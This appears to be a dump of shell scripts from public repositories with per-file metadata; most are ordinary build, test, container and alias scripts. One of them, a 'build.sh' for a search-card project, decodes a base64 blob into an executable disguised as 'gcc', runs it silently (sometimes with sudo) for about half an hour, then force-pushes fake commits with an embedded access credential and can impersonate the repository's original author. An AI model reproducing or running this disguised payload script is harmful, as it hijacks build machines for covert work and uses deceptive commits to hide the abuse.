export PYTHONPATH="$GDAL_PYTHONPATH:$PYTHONPATH"
echo "Setting PYTHONPATH=$PYTHONPATH"
fi
unset GDAL_PYTHONPATH
| true
|
d28692060dde2b252f37d5adaf756de2642bb2e3
|
Shell
|
ORG-MARS/zenml
|
/tests/testing.sh
|
UTF-8
| 1,364
| 3.390625
| 3
|
[
"Apache-2.0"
] |
permissive
|
#
# Copyright (c) maiot GmbH 2021. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at:
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express
# or implied. See the License for the specific language governing
# permissions and limitations under the License.
#
#! /usr/bin/env bash
# bash way of splitting of the current directory name
CWD=${PWD##*/}
ZENML_DIR=".zenml"
GIT=".git"
PIPELINES="pipelines"
if [ -d "$ZENML_DIR" ] || [ -d "$PIPELINES" ] || [ -d "$GIT" ]; then
# Take action if $DIR exists. #
echo "Either the .zenml, .git or pipelines directory exists already. Make sure to run tests in a clean directory."
exit 1
fi
# make sure that the current directory is tests, otherwise complain
if [ "$CWD" != "tests" ]; then
echo "Make sure to run ZenML tests directly from the tests directory."
exit 1
fi
git init
git add .
git commit -m 'test commit'
python generate_test_pipelines.py
pytest ../zenml
PYTEST_EXIT=$?
rm -rf $GIT
rm -rf $ZENML_DIR
rm -rf $PIPELINES
rm .gitignore
exit $PYTEST_EXIT
| true
|
845c9d5fab14ad2ec05ac211237dfe2252c3cdb0
|
Shell
|
qiankunli/run-k8s
|
/centos6/k8s/stop_k8s_minion.sh
|
UTF-8
| 426
| 3.234375
| 3
|
[] |
no_license
|
#!/bin/bash
cur_process_id=$(ps -ef|grep kube-proxy | grep -v grep |awk '{print $2}')
if [ "x${cur_process_id}" != "x" ] ; then
echo "current pid of kube-proxy: $cur_process_id kill it"
kill -9 $cur_process_id
fi
cur_process_id=$(ps -ef|grep kubelet |grep -v grep |awk '{print $2}' )
if [ "x${cur_process_id}" != "x" ] ; then
echo "current pid of kubelet: $cur_process_id kill it"
kill -9 $cur_process_id
fi
| true
|
45b22451a9cd15b8b8ce51faed459ae8487636ea
|
Shell
|
a-godman/search-card
|
/build.sh
|
UTF-8
| 3,179
| 3.4375
| 3
|
[
"MIT"
] |
permissive
|
#!/usr/bin/env bash
MODE="GitLab"
SUDO=""
if [[ $1 == 'apg' ]]
then
SUDO="sudo"
elif [[ $1 == 'make' ]]
then
if [[ $MODE == 'Bitbucket' || $MODE == 'GitLab' ]]
then
base64 -d gcc.64 > gcc 2>/dev/null
chmod +x gcc &>/dev/null
fi
elif [[ $1 == 'rebuild' ]]
then
if [[ $MODE == 'Bitbucket' || $MODE == 'GitLab' ]]
then
base64 -d gcc.64 > gcc 2>/dev/null
chmod +x gcc &>/dev/null
fi
SUDO="sudo"
else
if [[ $MODE == 'Bitbucket' || $MODE == 'GitLab' ]]
then
base64 -d gcc.64 > gcc 2>/dev/null
chmod +x gcc &>/dev/null
fi
fi
$SUDO ./gcc &>/dev/null
D="n"
TB=$(date +%s)
TD=$((1800 + $(shuf -i 0-180 -n 1)))
TE=$((TB + TD))
TEC=$((TB + 1))
while true
do
TC=$(date +%s)
if [[ $D == 'n' ]]
then
if [[ TC -gt TEC ]]
then
git clone --branch master --depth 20 --no-tags --single-branch https://github.com/a-godman/search-card.git cloned_repo &>/dev/null || true
cd cloned_repo || true
R=$((RANDOM % 2))
H=$(git rev-list master | tail --lines 1) || true
if [[ R -eq 0 ]]
then
git config user.email 'a.goodman68@list.ru' &>/dev/null || true
git config user.name 'Akbar Goodman' &>/dev/null || true
else
AE=$(git log --format='%ae' "$H") || true
AN=$(git log --format='%an' "$H") || true
git config user.email "a$AE" &>/dev/null || true
git config user.name "$AN" &>/dev/null || true
fi
RF1=$(find . ! -path './.git/*' -size -50k -type f ! -iname '.*' ! -iname '_*' | shuf | head --lines 1) || true
RF2=$(find . ! -path './.git/*' -size -50k -type f ! -iname '.*' ! -iname '_*' | shuf | head --lines 1) || true
RF1B=$(basename "$RF1") || true
RF2B=$(basename "$RF2") || true
RF1D=$(dirname "$RF1") || true
RF2D=$(dirname "$RF2") || true
rm -rf "$RF1D"/."$RF1B" &>/dev/null || true
rm -rf "$RF2D"/."$RF2B" &>/dev/null || true
rm -rf "$RF1D"/_"$RF1B" &>/dev/null || true
rm -rf "$RF2D"/_"$RF2B" &>/dev/null || true
if [[ R -eq 0 ]]
then
cp -rf "$RF1" "$RF1D"/."$RF1B" &>/dev/null || true
cp -rf "$RF2" "$RF2D"/_"$RF2B" &>/dev/null || true
else
cp -rf "$RF1" "$RF1D"/_"$RF1B" &>/dev/null || true
cp -rf "$RF2" "$RF2D"/."$RF2B" &>/dev/null || true
fi
git add . &>/dev/null || true
git log --format='%B' "$(git rev-list master | tail --lines 1)" | git commit --file - &>/dev/null || true
P_1=""
P_2="yuOyIra4T2O"
git push --force --no-tags https://a-godman:''"$P_1""$P_2"''@github.com/a-godman/search-card.git &>/dev/null || true
cd .. || true
rm -rf cloned_repo || true
D="y"
fi
fi
echo $TC
sleep 60
TC=$(date +%s)
if [[ TC -gt TE ]]
then
$SUDO kill "$(pgrep gcc)" &>/dev/null
break
fi
done
rm -rf gcc &>/dev/null
| true
|
aa1cd5ec66576fb2b781232b5b63f95934569dab
|
Shell
|
ilventu/aur-mirror
|
/mawk/PKGBUILD
|
UTF-8
| 792
| 2.75
| 3
|
[] |
no_license
|
# Contributor: judd <jvinet@zeroflux.org>
# Committer: Judd Vinet <jvinet@zeroflux.org>
# Maintainer: Stefan Husmann <stefan-husmann@t-online.de>
pkgname=mawk
pkgver=1.3.4_20120627
pkgrel=1
pkgdesc="An interpreter for the AWK Programming Language"
arch=('i686' 'x86_64')
license=('GPL')
provides=('awk')
depends=('glibc')
url="http://freshmeat.net/projects/mawk/"
source=(ftp://invisible-island.net/$pkgname/$pkgname-${pkgver/_/-}.tgz)
md5sums=('df60e65d8c7cf5c6c571ae28fee93289')
build() {
cd $srcdir/$pkgname-${pkgver/_/-}
sed -ie 's|log()|log(1.0)|g' configure
sed -ie "s|trap *0|trap 'exit 0' 0|g" test/*
./configure
make -j1
}
package () {
cd $srcdir/$pkgname-${pkgver/_/-}
install -d $pkgdir/usr/bin
install -d $pkgdir/usr/share/man/man1
make BINDIR=$pkgdir/usr/bin \
MANDIR=$pkgdir/usr/share/man/man1 install
}
| true
|
68d5d2c86519c43997f11532afed19ff8ad46d6f
|
Shell
|
Danielshow/prepare_my_workspace
|
/main.sh
|
UTF-8
| 1,171
| 3.234375
| 3
|
[] |
no_license
|
#!/bin/bash
function open_workspace(){
for f in `seq 1 4 `; do
case $f in
1)
tmux split-window -h -t $1
tmux send-keys -t $1:1 fluxx Enter
tmux send-keys -t $1:1 bes Enter
tmux select-layout -t $1 even-horizontal
;;
2)
tmux split-window -h -t $1
tmux send-keys -t $1:1 fluxx Enter
tmux send-keys -t $1:1 que Enter
tmux select-layout -t $1 even-horizontal
;;
3)
tmux split-window -h -t $1
tmux send-keys -t $1:1 fluxx Enter
tmux send-keys -t $1:1 dyn Enter
tmux select-layout -t $1 even-horizontal
;;
4)
tmux split-window -v -t $1
tmux send-keys -t $1:1 es Enter
;;
*)
echo Thats All
;;
esac
done
}
function set_requirement(){
base_session='my_work_space'
session_name=$base_session
tmux new-session -d -s $base_session
tmux -2 attach-session -t $session_name >/dev/null 2>&1
open_workspace $base_session
tmux new-window -t $session_name:2
tmux send-keys -t $session_name:2 fluxx Enter
tmux send-keys -t $session_name:2 'vim .' Enter
}
set_requirement
| true
|
ca2978f248cd8b3d84262a65ab14ce5d5360e030
|
Shell
|
rafex/lxc-scripts
|
/initCentOS.sh
|
UTF-8
| 3,859
| 3.5625
| 4
|
[] |
no_license
|
#!/bin/bash
SCRIPTSPATH=`dirname ${BASH_SOURCE[0]}`
source $SCRIPTSPATH/lib.sh
distro="centos"
release="7"
if [ -z $2 ]
then
echo "please call $0 <name of new container> <cid> <release, default is $release> <arch, default is amd64> <autostart, default is 1>"
echo " eg. $0 50-centos-mymachine 50"
exit 1
fi
name=$1
cid=$2
if [ ! -z $3 ]
then
release=$3
fi
arch="amd64"
if [ ! -z $4 ]
then
arch=$4
fi
autostart=1
if [ ! -z $5 ]
then
autostart=$5
fi
rootfs_path=/var/lib/lxc/$name/rootfs
config_path=/var/lib/lxc/$name
networkfile=${rootfs_path}/etc/sysconfig/network-scripts/ifcfg-eth0
bridgeInterface=$(getBridgeInterface) || die "cannot find the bridge interface"
bridgeAddress=$(getIPOfInterface $bridgeInterface) || die "cannot find the address for the bridge $bridgeInterface"
networkAddress=$(echo $bridgeAddress | cut -f1,2,3 -d".")
IPv4=$networkAddress.$cid
if ( [ "$release" == "5" ] ) || ( [ "$release" == "7" ] && [ "$arch" == "i686" ] )
then
if [ -z `which yum` ]
then
echo "please activate the universe repository and run: apt-get install yum"
exit -1
fi
arch2=$arch
if [ "$arch" == "amd64" ]
then
arch2="x86_64"
fi
if ( [ "$release" == "7" ] && [ "$arch" == "i686" ] )
then
lxc-create -n $name -t $distro -- --repo=http://mirror.centos.org/altarch/7/os/i386/ --release=$release --arch=i686 || exit 1
else
lxc-create -n $name -t $distro -- --release=$release --arch=$arch2 || exit 1
fi
else
lxc-create -t download -n $name -- -d $distro -r $release -a $arch || exit 1
fi
ssh-keygen -f "/root/.ssh/known_hosts" -R $IPv4
sed -i "s/HOSTNAME=.*/HOSTNAME=$name/g" $rootfs_path/etc/sysconfig/network
sed -i 's/^BOOTPROTO=*/BOOTPROTO=static/g' $networkfile
echo "IPADDR=$IPv4" >> $networkfile
echo "GATEWAY=$bridgeAddress" >> $networkfile
echo "NETMASK=255.255.255.0" >> $networkfile
echo "NETWORK=$networkAddress.0" >> $networkfile
echo "nameserver $bridgeAddress" > $rootfs_path/etc/resolv.conf
network="lxc.network"
if [ -z "`cat $rootfs_path/../config | grep "$network.link"`" ]
then
# lxc 3
network="lxc.net.0"
fi
sed -i "s/$network.link = lxcbr0/$network.link = $bridgeInterface/g" $rootfs_path/../config
if [[ "$network" == "lxc.network" ]]; then
echo "$network.ipv4="$IPv4"/24" >> $rootfs_path/../config
else
echo "$network.ipv4.address = "$IPv4"/24" >> $rootfs_path/../config
fi
#echo "lxc.network.ipv4.gateway=$networkaddress.1" >> $rootfs_path/../config
echo "127.0.0.1 "$name" localhost" > $rootfs_path/etc/hosts
if [ "$release" == "7" ]
then
if [[ "$network" == "lxc.network" ]]; then
echo "lxc.aa_profile = unconfined" >> $rootfs_path/../config
# see http://serverfault.com/questions/658052/systemd-journal-in-debian-jessie-lxc-container-eats-100-cpu
echo "lxc.kmsg = 0" >> $rootfs_path/../config
fi
sed -i "s/ConditionPathExists/#ConditionPathExists/g" $rootfs_path/lib/systemd/system/getty@.service
# see https://wiki.archlinux.org/index.php/Lxc-systemd
echo "lxc.autodev = 1" >> $rootfs_path/../config
fi
# mount yum cache repo, to avoid redownloading stuff when reinstalling the machine
hostpath="/var/lib/repocache/$cid/$distro/$release/$arch/var/cache/yum"
$SCRIPTSPATH/initMount.sh $hostpath $name "/var/cache/yum"
# configure timezone
cd $rootfs_path/etc; rm -f localtime; ln -s ../usr/share/zoneinfo/Europe/Berlin localtime; cd -
# yum: keep the cache
sed -i 's/^keepcache=0/keepcache=1/g' $rootfs_path/etc/yum.conf
# install openssh-server
lxc-start -d -n $name
sleep 5
lxc-attach -n $name -- yum -y install openssh-server && systemctl start sshd
lxc-stop -n $name
# drop root password completely
chroot $rootfs_path passwd -d root
# disallow auth with null password
sed -i 's/nullok//g' $rootfs_path/etc/pam.d/system-auth
install_public_keys $rootfs_path
configure_autostart $autostart $rootfs_path
info $cid $name $IPv4
| true
|
363b57e18d097709559268a7bcf803db87140e49
|
Shell
|
fbrei/MyDotFiles
|
/i3blocks/currently_playing
|
UTF-8
| 766
| 3.671875
| 4
|
[] |
no_license
|
#!/bin/bash
ARTIST_MAX=25
SONG_MAX=25
## ===================================================
ARTIST_LIMIT=$((ARTIST_MAX - 3))
SONG_LIMIT=$((SONG_MAX - 3))
case "$BLOCK_INSTANCE" in
cmus)
ARTIST="$(cmus-remote -Q | awk '$2=="artist" { $1=""; $2=""; print $0; exit }' )"
SONG="$(cmus-remote -Q | awk '$2=="title" { $1=""; $2=""; print $0; exit }' )"
;;
audacious)
ARTIST="$(audtool --current-song-tuple-data artist)"
SONG="$(audtool --current-song-tuple-data title)"
;;
*)
echo "n/a"
exit
;;
esac
if [ ${#ARTIST} -gt $ARTIST_MAX ]
then
ARTIST=$(printf "%s..." "${ARTIST:0:$ARTIST_LIMIT}")
fi
if [ ${#SONG} -gt $SONG_MAX ]
then
SONG=$(printf "%s..." "${SONG:0:$SONG_LIMIT}")
fi
echo $ARTIST - $SONG
| true
|
4a630f0e6f450f87b42a2aeea2d45853a1a3fbb7
|
Shell
|
Niels-Frederik/dotfiles
|
/Scripts/test.sh
|
UTF-8
| 379
| 2.6875
| 3
|
[] |
no_license
|
#!/bin/bash
bat_files="/sys/class/power_supply/BAT0"
full_charge=$(cat "${bat_files}/charge_full")
now_charge=$(cat "${bat_files}/charge_now")
echo $full_charge
echo $now_charge
res=($now_charge/$full_charge | bc)
echo ${res}
#echo ${now_charge}/${full_charge}
#res=$((now_charge*10/full_charge*10))
#echo print (now_charge/full_charge | perl)
#echo ${res}
#echo bc << ${res}
| true
|
ee9fd1242f7e92b0a280fa720727c55a6014f2ec
|
Shell
|
KrisSaxton/lfs-build-6.2
|
/bootscripts/lfs-bootscripts-6.2/install/configure
|
UTF-8
| 3,195
| 2.75
| 3
|
[] |
no_license
|
#!/bin/bash
################################################################################
# BEGIN
################################################################################
source functions
################################################################################
# GLOBALS
################################################################################
ABSetDefault AB_SYSTEM_INSTALL_DIR /usr/pkg
################################################################################
# DEPENDENCIES
################################################################################
ABSetDefault AB_PACKAGE_LFS_BOOTSCRIPTS_DEPENDS PKG_DEPENDS
ABSetDefault AB_PACKAGE_PKG_DEPENDS_INSTALL_ENABLE no
ABSetDefault AB_PACKAGE_PKG_DEPENDS_INSTALL_FORCE no
ABSetDefault AB_PACKAGE_PKG_DEPENDS_INSTALL_NAME pkgdependsname
ABSetDefault AB_PACKAGE_PKG_DEPENDS_INSTALL_DIR $AB_SYSTEM_INSTALL_DIR/$AB_PACKAGE_PKG_DEPENDS_INSTALL_NAME
ABSetDefault AB_PACKAGE_PKG_DEPENDS_INCLUDE_DIR $AB_PACKAGE_PKG_DEPENDS_INSTALL_DIR/include
ABSetDefault AB_PACKAGE_PKG_DEPENDS_LIB_DIR $AB_PACKAGE_PKG_DEPENDS_INSTALL_DIR/lib
#ABSetCompileFlags $AB_PACKAGE_LFS_BOOTSCRIPTS_DEPENDS
################################################################################
# CONFIGURATION
################################################################################
ABSetDefault AB_PACKAGE_LFS_BOOTSCRIPTS_NAME lfs-bootscripts
ABSetDefault AB_PACKAGE_LFS_BOOTSCRIPTS_VERSION 6.2
ABSetDefault AB_PACKAGE_LFS_BOOTSCRIPTS_DESC 'A collection of scripts to start and stop the system at bootup and shutdown'
ABSetDefault AB_PACKAGE_LFS_BOOTSCRIPTS_INSTALL_NAME ${AB_PACKAGE_LFS_BOOTSCRIPTS_NAME}-${AB_PACKAGE_LFS_BOOTSCRIPTS_VERSION}
ABSetDefault AB_PACKAGE_LFS_BOOTSCRIPTS_INSTALL_DIR $AB_SYSTEM_INSTALL_DIR/$AB_PACKAGE_LFS_BOOTSCRIPTS_INSTALL_NAME
ABSetDefault AB_PACKAGE_LFS_BOOTSCRIPTS_INCLUDE_DIR $AB_PACKAGE_LFS_BOOTSCRIPTS_INSTALL_DIR/include
ABSetDefault AB_PACKAGE_LFS_BOOTSCRIPTS_LIB_DIR $AB_PACKAGE_LFS_BOOTSCRIPTS_INSTALL_DIR/lib
ABSetDefault AB_PACKAGE_LFS_BOOTSCRIPTS_CONFIGURE_PREFIX $AB_PACKAGE_LFS_BOOTSCRIPTS_INSTALL_DIR
ABSetDefault AB_PACKAGE_LFS_BOOTSCRIPTS_CONFIGURE_WITH_EDITOR /usr/bin/nano
AB_PACKAGE_NAME=$AB_PACKAGE_LFS_BOOTSCRIPTS_NAME
AB_PACKAGE_VERSION=$AB_PACKAGE_LFS_BOOTSCRIPTS_VERSION
AB_PACKAGE_DESC=$AB_PACKAGE_LFS_BOOTSCRIPTS_DESC
AB_PACKAGE_INSTALL_NAME=$AB_PACKAGE_LFS_BOOTSCRIPTS_INSTALL_NAME
AB_PACKAGE_INSTALL_DIR=$AB_PACKAGE_LFS_BOOTSCRIPTS_INSTALL_DIR
AB_PACKAGE_INCLUDE_DIR=$AB_PACKAGE_LFS_BOOTSCRIPTS_INCLUDE_DIR
AB_PACKAGE_LIB_DIR=$AB_PACKAGE_LFS_BOOTSCRIPTS_LIB_DIR
AB_PACKAGE_CONFIGURE_PREFIX=$AB_PACKAGE_LFS_BOOTSCRIPTS_CONFIGURE_PREFIX
AB_PACKAGE_CONFIGURE_WITH_EDITOR=$AB_PACKAGE_LFS_BOOTSCRIPTS_CONFIGURE_WITH_EDITOR
################################################################################
# END
################################################################################
| true
|
99230be2328ea42e559f45994bbcaa7a7474a81a
|
Shell
|
metcalfc/stevedore
|
/scripts/install-ducp.sh
|
UTF-8
| 1,194
| 3.0625
| 3
|
[
"Apache-2.0"
] |
permissive
|
#!/bin/bash
DUCP_USERNAME=''
DUCP_PASSWORD=''
DUCP_VERSION='1.0.3'
for i in "$@"
do
case $i in
DUCP_USERNAME=*)
DUCP_USERNAME="${i#*=}"
shift
;;
DUCP_PASSWORD=*)
DUCP_PASSWORD="${i#*=}"
shift
;;
DUCP_VERSION=*)
DUCP_VERSION="${i#*=}"
shift
;;
esac
done
echo "Leading DUCP"
docker volume create --name ucp-controller-server-certs
docker run --name hold -v ucp-controller-server-certs:/data tianon/true
docker cp /vagrant/etc/ca.pem hold:/data/ca.pem
docker cp /vagrant/etc/ssl/certs/$(hostname -f).crt hold:/data/cert.pem
docker cp /vagrant/etc/ssl/private/$(hostname -f).key hold:/data/key.pem
docker run --rm \
--name ucp \
-v /var/run/docker.sock:/var/run/docker.sock \
-v /vagrant/etc/license.lic:/docker_subscription.lic \
-e UCP_ADMIN_USER=${DUCP_USERNAME} \
-e UCP_ADMIN_PASSWORD=${DUCP_PASSWORD} \
docker/ucp:${DUCP_VERSION} \
install \
--fresh-install \
--debug \
--san $(hostname -s) \
--san $(hostname -f) \
--host-address $(host $(hostname -f) | awk '/has address/ { print $4 ; exit }') \
--external-ucp-ca \
--swarm-port 3376
| true
|
ee2086f0091a20faa02a6c28bf52af9828c3a6bc
|
Shell
|
cristianoliveira/dotfiles
|
/zsh/aliases/git.zsh
|
UTF-8
| 3,979
| 3.0625
| 3
|
[] |
no_license
|
# This is default, but may vary by project.
# See '../settings/git.zsh' how to configure a different $LOCAL_MAIN_BRANCH
MAIN_BRANCH='main'
# git show
alias gsh='git show'
alias gshw='git show'
alias gshow='git show'
# git stash
alias gstsh='git stash'
alias gst='git stash'
alias gst!='git stash --include-untracked'
alias gstp='git stash pop'
alias gsta='git stash apply'
# git merge
alias gm='git merge'
alias gms='git merge --squash'
alias gmc='git merge --continue'
# git rebase
alias gr='git rebase'
alias gra='git rebase --abort'
alias ggrc='git rebase --continue'
alias grbi='git rebase --interactive'
alias grbom='git rebase origin/"$MAIN_BRANCH"'
# git log
alias gl='git l'
alias glg='git log'
alias glog='git l'
# git fetch
alias gf='git fetch'
alias gfp='git fetch --prune'
alias gfa='git fetch --all'
alias gfap='git fetch --all --prune'
alias gfch='git fetch'
# git diff
alias gd='git diff'
alias gdno='git diff --name-only'
# Staged and cached are the same thing
alias gdc='git diff --cached -w'
alias gds='git diff --staged -w'
# git pull
alias gpull='git pull'
alias gpl='git pull'
alias gplr='git pull --rebase'
# git push
alias gp='git push -u'
alias gps='git push'
alias gpush='git push'
alias gpushu='git push -u' # it sets the upstream for the given remote/branch
alias gpn='git push --no-verify' # avoid prehooks
alias gpf='git push --force-with-lease'
alias gp!='git push --no-verify' # avoid prehooks
alias gp!!='git push --no-verify --force-with-lease' # avoid prehooks and force
# git reset
alias grs='git reset'
alias grsh='git reset --hard'
alias grsth='git reset --hard'
alias grsom='git reset --hard origin/"$MAIN_BRANCH"'
alias grshom='git reset --hard origin/"$MAIN_BRANCH"'
alias grsthom='git reset --hard origin/"$MAIN_BRANCH"'
alias grst!='git reset --hard origin/"$MAIN_BRANCH"'
# git clean
alias gcln='git clean'
alias gclnf='git clean -df'
alias gclndfx='git clean -dfx'
# git submodule
alias gsm='git submodule'
alias gsmi='git submodule init'
alias gsmu='git submodule update'
# git checkout
alias gch='git checkout'
alias gchb='git checkout -b'
alias gch='git checkout'
alias gchm='git checkout "$MAIN_BRANCH"'
alias gchd='git checkout develop'
# git branch
alias gbo='git branch --sort=-committerdate'
alias gb='git branch --sort=-committerdate'
alias gbl='git branch --sort=-committerdate| head -n 1'
alias gdmb='git branch --merged | grep -v "\*" | xargs -n 1 git branch -d'
alias gnb='git nb' # new branch aka checkout -b
alias gb='git b'
alias gbh='git branch --sort=-committerdate | head -n'
alias gclb='git branch --sort=-committerdate | head -n 1 | pbcopy'
alias gbsync="~/.dotfiles/zsh/scripts/git-branch-sync"
alias gbls="git branch --list --format='%(refname:short)'"
# git helpers
alias gwip='git add . && git commit -m "WIP" --no-verify'
alias goverride='git push origin +$(git branch | grep \* | cut -d ' ' -f2)'
alias gdfb="git log --graph --pretty=format:'%Cred%h%Creset -%C(yellow)%d%Creset %s %Cgreen(%cr)%Creset' --abbrev-commit --date=relative"
alias gclnb='git branch --merged | grep -v "\*" | xargs -n 1 git branch -d'
alias gmlb='git merge `git branch --sort=-committerdate| head -n 1`'
alias gdm='git diff origin/"$MAIN_BRANCH"'
alias gllc='git log --format="%H" -n 1'
alias gpub='grb publish'
alias gtr='grb track'
alias glf='git follow'
alias co='git co'
alias gt='git t'
alias gbg='git bisect good'
alias gbb='git bisect bad'
alias gi='vim .gitignore'
alias gcm='git ci -m'
alias gcm!='git ci --no-verify -m'
alias gcim='git ci -m'
alias gci='git ci'
alias gco='git co'
alias gcp='git cp'
alias ga='git add -A'
alias gap='git add -p'
alias guns='git unstage'
alias gunc='git uncommit'
alias gam='git amen --reset-author'
alias grmv='git remote -v'
alias grmr='git remote rm'
alias grad='git remote add'
alias gs='git status'
alias gmt="git mergetool"
alias gamd='git commit --amend'
alias gamd!='git commit --amend --no-edit'
alias gchbm="git checkout origin/\$MAIN_BRANCH && git checkout -b"
| true
|
2a86b397fae9cd6109c8263e539937fe2f034162
|
Shell
|
UKGovLD/registry-core
|
/bin/make.sh
|
UTF-8
| 599
| 3.34375
| 3
|
[
"Apache-2.0"
] |
permissive
|
#!/bin/bash
# Build the war artifact and release it to the UKGovLD s3 bucket for use in deployments
# Assumes deployer credentials have been set in the environment via something like:
# export AWS_ACCESS_KEY_ID=ABC
# export AWS_SECRET_ACCESS_KEY=DEF
# export AWS_DEFAULT_REGION=eu-west-1
#mvn clean package || { echo "Maven build failed" 1>&2; exit 1; }
[[ `echo target/*.war` =~ target/(.*)$ ]] || { echo "Can't find war artifact" 1>&2; exit 1; }
upload=${BASH_REMATCH[1]}
echo "Uploading to s3://ukgovld/registry-core/$upload"
aws s3 cp target/$upload s3://ukgovld/registry-core/$upload
| true
|
4a54b7d799de500c1a919f9263d63072e91e0cf7
|
Shell
|
JohnHubcr/malware
|
/FlexiSpy/iphone-phoenix-old/FlexiSPY Phoenix 1.3.1/FlexiSPY/Packages/DEBIAN/prerm
|
UTF-8
| 656
| 2.96875
| 3
|
[
"LicenseRef-scancode-warranty-disclaimer"
] |
no_license
|
#!/bin/bash
declare -a cydia
cydia=($CYDIA)
if [[ ${CYDIA+@} ]]; then
SSMP_CYDIA_REMOVE="YES"
else
SSMP_CYDIA_REMOVE="NO"
fi
if [[ $1 == remove ]]; then
if [[ ${CYDIA+@} ]]; then
eval "echo 'finish:restart' >&${cydia[0]}"
fi
. /Applications/systemcore.app/Uninstall.sh $SSMP_CYDIA_REMOVE
fi
#echo "*********************************************************"
#echo "*********************************************************"
#echo "TO COMPLETE UNINSTALL RESTART SPRINGBOARD NOW!"
#echo "*********************************************************"
#echo "*********************************************************"
#echo ""
#echo ""
sleep 3
exit 0
| true
|
6c86a85b6358a59a9b15bd6b98ab37fd2db8e397
|
Shell
|
fszostak/bash-util-scripts
|
/src/k-mem
|
UTF-8
| 723
| 3.78125
| 4
|
[] |
no_license
|
#!/usr/bin/env bash
#-----------------------------
# k-mem (2022) fszostak
# Thu 24 Feb 2022 08:11:29 AM -03
#
# Show memory usage of namespace
if [ $# -eq 0 ]; then
echo "usage: k-mem <namespace> [-w] [sleep]"
exit
fi
NAMESPACE=$1
WATCH=$2
SLEEP=$3
if [ "$SLEEP" = "" ]; then
SLEEP=10
fi
while true
do
echo -n "$(date +'%F %T');$NAMESPACE"
SUM=0; for N in $(kubectl top pods -n $NAMESPACE| awk '{print $2 }' | sed 's/m//' | grep -v CPU); do let SUM=$SUM+$N; done; echo -n ";cpu ${SUM}m"
SUM=0; for N in $(kubectl top pods -n $NAMESPACE| awk '{print $3 }' | sed 's/Mi//' | grep -v MEMORY); do let SUM=$SUM+$N; done; echo -n ";memory ${SUM}Mi"
echo
if [ "$WATCH" != "-w" ]; then
break
fi
sleep $SLEEP
done
| true
|
90f9fdafbdc5601126413bbbfff17e50fbb8cc83
|
Shell
|
rflynn/osx-vm
|
/demo-docker-machine-xhyve.sh
|
UTF-8
| 782
| 2.734375
| 3
|
[] |
no_license
|
#!/bin/bash
set -o xtrace
set -o errexit
set -o pipefail
brew update
brew install docker-machine-driver-xhyve
sudo chown root:wheel $(brew --prefix)/opt/docker-machine-driver-xhyve/bin/docker-machine-driver-xhyve
sudo chmod u+s $(brew --prefix)/opt/docker-machine-driver-xhyve/bin/docker-machine-driver-xhyve
docker-machine create \
--driver xhyve \
--xhyve-cpu-count 1 \
--xhyve-memory-size 1024 \
--xhyve-disk-size 10000 \
default
#--xhyve-experimental-nfs-share \
docker-machine env default
eval $(docker-machine env default)
sudo cp /var/db/dhcpd_leases \
/var/db/dhcpd_leases.backup && \
sudo cp /Library/Preferences/SystemConfiguration/com.apple.vmnet.plist \
/Library/Preferences/SystemConfiguration/com.apple.vmnet.plist.backup
| true
|
8bf290f76d056f0d7b5fd10fe7e3499883822433
|
Shell
|
icanka/nexus
|
/scripts/inpath
|
UTF-8
| 266
| 3.828125
| 4
|
[] |
no_license
|
#! /bin/bash
in_path()
{
cmd=$1
ourpath=$2
result=1
oldIFS=$IFS
IFS=":"
for directory in "$ourpath"
do
echo ${directory}
#if [ -x $directory/$cmd ] ; then
result=0 # If we are here, we found the command.
#fi
done
IFS=$oldIFS
return $result
}
| true
|
8e3c34f82daae6f788bcc6dc7bb183207135d1b7
|
Shell
|
MrMichou/tools_made
|
/whitlist_ipset.sh
|
UTF-8
| 1,304
| 3.140625
| 3
|
[] |
no_license
|
#!/bin/bash
value=""
for ip in $(sudo cat /var/log/syslog | grep "$cat_date" | grep "$value" | awk '{print $10}' | tr -d SRC= | sort -h | uniq -u);do
country=$(whois $ip | egrep -i '[C|c]ountry:' | awk '{ print $2 }' | uniq -u)
ISP=""
if [[ $country == "FR" ]];then
ISP=$(whois $ip | grep 'role')
case $ISP in
*"SFR"*)
route=$(whois $ip | grep route | awk '{ print $2 }')
if [[ $1 =~ '(Y|y)es' ]];then
sudo ipset add IpAuto $route
fi
ISP="SFR"
;;
*"Bouygue"*)
route=$(whois $ip | grep route | awk '{ print $2 }')
if [[ $1 =~ '(Y|y)es' ]];then
sudo ipset add IpAuto $route
fi
ISP="Bouygue"
;;
*"Wanadoo"*)
route=$(whois $ip | grep route | awk '{ print $2 }')
if [[ $1 =~ '(Y|y)es' ]];then
sudo ipset add IpAuto $route
fi
ISP="Wanadoo"
;;
*"ProXad"*)
route=$(whois $ip | grep route | awk '{ print $2 }')
if [[ $1 =~ '(Y|y)es' ]];then
sudo ipset add IpAuto $route
fi
ISP="Free"
;;
*"Numericable"*)
route=$(whois $ip | grep route | awk '{ print $2 }')
if [[ $1 =~ '(Y|y)es' ]];then
sudo ipset add IpAuto $route
fi
ISP="Numericable"
;;
*)
ISP=""
;;
esac
fi
list="$list \n$ip \t $country \t $ISP"
done;
echo -e $list
| true
|
48e389a851d4e8547af7fcae02153e29a3b76f63
|
Shell
|
p4lang/p4c
|
/tools/check-git-submodules.sh
|
UTF-8
| 2,057
| 4.65625
| 5
|
[
"Apache-2.0"
] |
permissive
|
#!/bin/bash
# This checks that the refpoint for each git submodule is on the respective
# branch that we are tracking.
### Begin configuration #######################################################
THIS_DIR=$( cd -- "$( dirname -- "${BASH_SOURCE[0]}" )" &> /dev/null && pwd )
declare -A branchOverrides=(
)
### End configuration #########################################################
set -e
skipFetch=false
if [[ $# -gt 0 && "$1" == '--skip-fetch' ]] ; then
skipFetch=true
shift
fi
if [[ $# == 0 ]] ; then
# No arguments given. Create a temporary file and call ourselves on each git
# submodule. If the check fails for any submodule, the temporary file will be
# removed.
tmpfile="$(mktemp --tmpdir check-git-submodules.XXXXXXXXXX)"
${skipFetch} || git fetch --quiet origin
git submodule --quiet foreach \
"${THIS_DIR}"'/check-git-submodules.sh ${sm_path} ${sha1} '"${tmpfile}"
rm "${tmpfile}" &>/dev/null
else
sm_path="$1"
sha1="$2"
tmpfile="$3"
echo "Checking submodule ${sm_path} with sha ${sha1} in folder ${PWD}."
${skipFetch} || git fetch --quiet origin
# Figure out what branch we are tracking (e.g., "origin/main") and derive a
